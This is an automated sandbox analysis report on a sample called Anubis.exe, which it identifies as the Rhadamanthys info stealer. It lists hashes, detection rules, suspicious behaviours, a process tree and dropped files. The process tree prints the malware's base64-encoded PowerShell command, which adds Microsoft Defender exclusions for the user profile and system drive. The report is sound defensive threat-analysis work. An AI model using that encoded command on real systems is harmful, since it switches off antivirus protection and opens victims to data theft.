Analysis
-
max time kernel
93s -
max time network
93s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/08/2024, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
Anubis.exe
Resource
win11-20240802-en
General
-
Target
Anubis.exe
-
Size
1.2MB
-
MD5
c2adb7ff42f1c961035f17bad5bee12d
-
SHA1
e2ae36539f9ff88e8a89d750e99d15ea6e84f0dc
-
SHA256
4b350ae0b85aa7f7818e37e3f02397cd3667af8d62eb3132fb3297bd96a0abe2
-
SHA512
16413f90689cfa3fc509637bea54634ead1bba7f89d621bbc8096279f2413cd3477142a63becfa457e5756583c34049699ab1e960d1133dad2f72e3325ecb348
-
SSDEEP
24576:uDDgbYd14JwD00GR/L4Sgh5ovGpuIGPBgyjhgQJ8L/inWS:gcbILXoO3p9GP6ydk/inWS
Malware Config
Signatures
-
Detect rhadamanthys stealer shellcode 4 IoCs
resource yara_rule behavioral1/memory/4408-50-0x00000000024E0000-0x00000000028E0000-memory.dmp family_rhadamanthys behavioral1/memory/4408-48-0x00000000024E0000-0x00000000028E0000-memory.dmp family_rhadamanthys behavioral1/memory/3400-581-0x0000000002410000-0x0000000002810000-memory.dmp family_rhadamanthys behavioral1/memory/4568-621-0x0000000002100000-0x0000000002500000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 4784 Launcher.exe 4408 WindowsHost.exe 5004 Launcher.exe 3400 WindowsHost.exe 3164 Launcher.exe 4568 WindowsHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 3 camo.githubusercontent.com 34 camo.githubusercontent.com 41 raw.githubusercontent.com 2 raw.githubusercontent.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anubis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anubis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anubis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsHost.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 WindowsHost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID WindowsHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WindowsHost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WindowsHost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WindowsHost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133675987015889275" chrome.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\spooferconfig.dll:Zone.Identifier chrome.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4292 powershell.exe 4292 powershell.exe 4408 WindowsHost.exe 4408 WindowsHost.exe 2216 chrome.exe 2216 chrome.exe 1484 powershell.exe 1484 powershell.exe 1484 powershell.exe 3400 WindowsHost.exe 3400 WindowsHost.exe 3104 powershell.exe 3104 powershell.exe 3104 powershell.exe 4568 WindowsHost.exe 4568 WindowsHost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4292 powershell.exe Token: SeShutdownPrivilege 4408 WindowsHost.exe Token: SeCreatePagefilePrivilege 4408 WindowsHost.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe Token: SeCreatePagefilePrivilege 2216 chrome.exe Token: SeShutdownPrivilege 2216 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe 2216 chrome.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4816 Anubis.exe 3400 WindowsHost.exe 5004 Launcher.exe 4092 Anubis.exe 4568 WindowsHost.exe 3164 Launcher.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1488 wrote to memory of 4292 1488 Anubis.exe 81 PID 1488 wrote to memory of 4292 1488 Anubis.exe 81 PID 1488 wrote to memory of 4292 1488 Anubis.exe 81 PID 1488 wrote to memory of 4784 1488 Anubis.exe 83 PID 1488 wrote to memory of 4784 1488 Anubis.exe 83 PID 1488 wrote to memory of 4408 1488 Anubis.exe 85 PID 1488 wrote to memory of 4408 1488 Anubis.exe 85 PID 1488 wrote to memory of 4408 1488 Anubis.exe 85 PID 4784 wrote to memory of 1880 4784 Launcher.exe 86 PID 4784 wrote to memory of 1880 4784 Launcher.exe 86 PID 2216 wrote to memory of 3460 2216 chrome.exe 91 PID 2216 wrote to memory of 3460 2216 chrome.exe 91 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 4912 2216 chrome.exe 92 PID 2216 wrote to memory of 2856 2216 chrome.exe 93 PID 2216 wrote to memory of 2856 2216 chrome.exe 93 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94 PID 2216 wrote to memory of 4896 2216 chrome.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anubis.exe"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffa4622cc40,0x7ffa4622cc4c,0x7ffa4622cc582⤵PID:3460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1948 /prefetch:22⤵PID:4912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1692,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2080 /prefetch:32⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2216 /prefetch:82⤵PID:4896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3096,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:2640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4424 /prefetch:12⤵PID:3172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3528,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4788 /prefetch:82⤵PID:1992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4896 /prefetch:82⤵PID:1712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4272,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4780 /prefetch:12⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3768,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4256 /prefetch:82⤵PID:2624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3364,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5040 /prefetch:12⤵PID:4056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5292,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5332 /prefetch:82⤵PID:1608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5296,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5460 /prefetch:82⤵PID:400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5304,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5620 /prefetch:82⤵PID:3740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5312,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5760 /prefetch:82⤵PID:344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5320,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5908 /prefetch:82⤵PID:560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5284,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5888 /prefetch:82⤵
- NTFS ADS
PID:1228
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2092
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2984
-
C:\Users\Admin\Downloads\Anubis.exe"C:\Users\Admin\Downloads\Anubis.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:2388
-
-
-
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3400
-
-
C:\Users\Admin\Downloads\Anubis.exe"C:\Users\Admin\Downloads\Anubis.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3164 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4568
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:3392
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\535f3bba-fa95-40ff-82e2-f67da2360305.tmp
Filesize10KB
MD5bcc4ec00fb6bc3c437ee28c79d3b00cd
SHA1aeb8ae2dacbe286e1a9016d3a77fb686159c9505
SHA256a45f3b31fe1f6a2b2af0fcfe684aa64f417b6146937d1536b5950537d4a10951
SHA512067deafc1cd3f391d2e59eee75a85115a1be6f24c16aaf7c367411210d7c242def4ef483cb98935592069ff5bbf17a40ec28a214da8d765a95addae4bafe3544
-
Filesize
3KB
MD5f9d25577754a2d7cc81a3aea14cea3a1
SHA1d729de9b954ab78890df717dcaa487c6fbc0c365
SHA2566880abc3d67f04f133308ddb7de3f71e5ad10b0dfc2ae5db56d8aa501d7517aa
SHA512b57c7856d1e03862d2af970db15b923cdc79ce8e3104c0c4316f11004e4f84f69fce3758bb4411b56891be322f630d3998396e58d72f00508f7e670d59684031
-
Filesize
3KB
MD577de01b92b2a00cd413773e676038ba7
SHA102e42e8dbef69b6e40e39f5cf91d707216958ac7
SHA256f20a408e932b55c76a3837bcb63d5d2365b41b16036cd6419b1d99d87ff3fed6
SHA5127b03b53376bc40cffd9741f172c8c3103610550ea72bf10260e3b71fc198d826f4340c440c67ef7216ff84602a6f14bbbc7c4c850f3bbf5ad345ab5b6c6740eb
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
1KB
MD5edca1c8202ea9ff7dd81a257be15ad90
SHA141fefbccba1c5b18f2f890bdc10bb4525d57dda3
SHA2560d3b857f1095e34ad361afad7274ef82e3636cb132be31f97a46b965cdee57ce
SHA5129c3d6c6bfd3c6b62e1c9dbf1db6a4240644a33affeef1dd77cbca82a1fd1b3e236e9ddcc142290be570c26b2cbfe11ce58533291ce8452e7ae6abc1e5e920900
-
Filesize
2KB
MD535acec21e415df47f6daf212f2d89c22
SHA1f5db9578bd588d5bbe69557d16b869e1e94a8b4d
